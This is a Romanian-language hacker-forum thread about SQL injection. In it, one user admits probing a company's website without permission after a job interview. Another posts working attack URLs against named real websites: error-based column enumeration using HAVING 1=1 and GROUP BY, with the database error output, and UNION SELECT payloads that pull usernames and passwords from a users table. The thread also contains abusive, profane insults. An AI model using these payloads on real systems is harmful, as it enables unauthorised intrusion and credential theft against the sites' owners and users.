Mysql Comments

[michee]

postez aici ca n-am vazut topic special de mysql injection.....este XSS dar nu si asta...

Deci...am gasit un SQL injection intr-un site.....faza e ca

am ceva de genul ....WHERE id=123142 eu inserez un "ORDER BY 20 --"

si rezulta ceva WHERE id=123142 ORDER BY 20 -- GROUP BY alt_id

Faza e ca-mi da o eroare la GROUP BY ....De ce nu merge comentariul -- ??

Stiti alta metoda sa comentez ce urmeaza? adik GROUP BY -ul? Eu n-am gasit.......

[kw3rln]

da-ne si noua linkul! ai pus la sf "/*" ?

[michee]

linkul chiar nu pot sa vi-l dau ptr ca dau interviu la ei.....

am pus -- Nu e comentariu?

se pare ca ai dreptate, mege cu /*......da de ce asa si nu asa?

ps: asta nu face parte din interviu!

[escalation666]

look here kid...un exemplu live pentru tine

http://www.cartel-alfa.ro/navigare.asp?id=77%20having%201=1

testam rapid daca baza de date "scuipa" ceva columns, cu "having 1=1"

Microsoft OLE DB Provider for SQL Server error '80040e14'

Column 'tblNews.News_ID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. 

Noua tabela aflata o folosim intr-o interogare de tipul "group by", dupa cum urmeaza:

http://www.cartel-alfa.ro/navigare.asp?id=77%20%20group%20by%20tbl.News.News_ID%20having%201=1

Microsoft OLE DB Provider for SQL Server error '80040e14'

Column 'tblNews.News_title' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. 

a doua tabela aflata, iarasi o folosim intr-o interogare de tipul "group by":

http://www.cartel-alfa.ro/navigare.asp?id=77%20%20group%20by%20tbl.News.News_ID,tblNews.News_title%20having%201=1

Microsoft OLE DB Provider for SQL Server error '80040e14'

Column 'tblNews.News_Date' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. 

.

.

.

pana se ajunge la ceva de genul:

http://www.cartel-alfa.ro/navigare.asp?id=77%20%20group%20by%20tbl.News.News_ID,tblNews.News_title,tblNews.News_Date,tblNews.Short_news%20having%201=1

Microsoft OLE DB Provider for SQL Server error '80040e14'

The text, ntext, and image data types cannot be compared or sorted, except when using IS NULL or LIKE operator. 

Si cam asa se concretizeaza o metoda de aflare a tabelelor, dupa aceea cu informatiile obtinute putandu-se realiza un update, sau alte magarii.

Dar, dupa cum am invatat din experienta, cu sql injections ar cam trebui sa te porti cam cum ar trebui sa te porti cu femeile

Adica...ajunge atata vorbarie cu group by...having 1=1-- blabla...u just have to stick it

like this:

pass:

http://www.antibiotice.ro/news.php?id=-1/**/UNION/**/ALL/**/SELECT/**/0,1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/FROM/**/users/*

luser:

http://www.antibiotice.ro/news.php?id=-1/**/UNION/**/ALL/**/SELECT/**/0,1,2,username,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/FROM/**/users/*

si cam atat pentru azi...si multe vreme de acu incolo

[michee]

mersi,da ii rezolvasem:)

Oricum exemplul e binevenit, thanks.

[kw3rln]

se pare ca ai dreptate, mege cu /*......da de ce asa si nu asa?

ma bucur ca te-am putut ajuta !

interviu? wtf

[michee]

mda....interviu.......am fost pe la unii la interviu, m-am enervat un pic si am ajuns acasa......si-am inceput sa le iau site-ul la puricat:)

Concluzia e ca era dezastru....si ei ma intrebau pe mine intr-un test daca "Nycole"(cred ca asta iesea dintr-o anagrama) e nume insula,fluviu, oras, ocean sau pm:))

ps: sa revenim la sql injection. Acelasi lucru de mai sus cu HAVING 1=1 il obtineam cu un simplu ' . Acuma pe mysql server iau datele despre toate db-urile si toate tabelele din db-ul INFORMATION_SCHEMA. pe SQL Server-ul ala sau ce era, cum obtin aceste date?

[escalation666]

heh...e vorba despre insula Ceylon...cat despre celelalte nu stiu ce sa zic...te rogi la all Mighty god? :roll:

oricum, il vrei pe d-zeu cu intrebarile tale, mai ales ca nu dai nici o informatie

[michee]

1)ceylon.....whatever....Who the fuck cares, really? Ce eu m-am dus acolo sa dau test de cultura generala? Eram invitat cumva la "Vrei sa fii miliardar" si nu mi-am dat eu seama?

2)sa ma rog la ce???? De ce???

3)pai ce informatie sa dau? E serverul care ti l-am zis...si practic ma interesa un echivalent al bazei de date information_schema din mysql (daca exista)....a.i. sa aflu date despe alte db-uri, tabele si campuri de pe serverul respectiv.

[escalation666]

Corect...ce iti trebuie tie cultura generala, fuckin' moron

Citeste un tutorial de sql injection daca nu ai prea multa lene in tine, "pai ce informatie sa dau?" da, pai ce informatii din erori poti sa dai, ca doar noi avem imaginatie bogata si ne putem inchipui. Si oricum e bine ca te intereseaza INFORMATION_SCHEMA, cu toate ca nu functioneaza sa o folosesti intotdeauna in interogari.

[michee]

Vere...explica-mi si mie relevanta culturii generale ptr un asemenea post.....baietii aia de-acolo nu stiau sa faca un site ANTI-INJECTION si ANTI-XSS.........apropo ei erau vreo 6 eu eram unu singur si culmea ironiei lucrau de vreo 6 ani la portalul ala.

Deci ce ti se mai important? Cine e mai avantajat? Stiau ei ca Ceylon e insula? Foarte bine, ma doare la pula.....i-am facut de tot rahatu practic.

Sa-nvete tot atlasu geografic si ce mai vor ei tot niste terminati sunt.....

Cand am zis ce informatie sa dau ====> Nu era nici o informatie de dat de aia nu am dat.

si inca o data .......MA FUT IN EA DE CULTURA GENERALA daca nu esti in stare sa faci(BINE) lucrul ptr ca esti platit sa-l faci.

[moubik]

ca sa te aperi de xss si de sql trebuie sa filtrezi absolut toate xssurile si sqlurile din siteul tau.

ca sa faci xss trebuie sa gasesti unul singur.

[michee]

da si n-am inteles exact ce vrei sa zici cu asta moubik....

[tw8]

da si n-am inteles exact ce vrei sa zici cu asta moubik....

Vrea sa spuna ca e mult mai greu sa securizezi un site decat sa gasesti o vulnerabilitate in el.

Bafta !

[michee]

....vere......deci ce-am gasit eu acolo erau chestii care puteau fi evitate foarte simplu cu 2 functii de filtrare una ptr XSS si una ptr SQL.....

Eu in site-urile mele am o singura functie de fapt care le face pe amandoua....si o apelez peste tot unde am un GET sau un POST....

Si cu functia asta in mod sigur 90% din atacuri zic eu....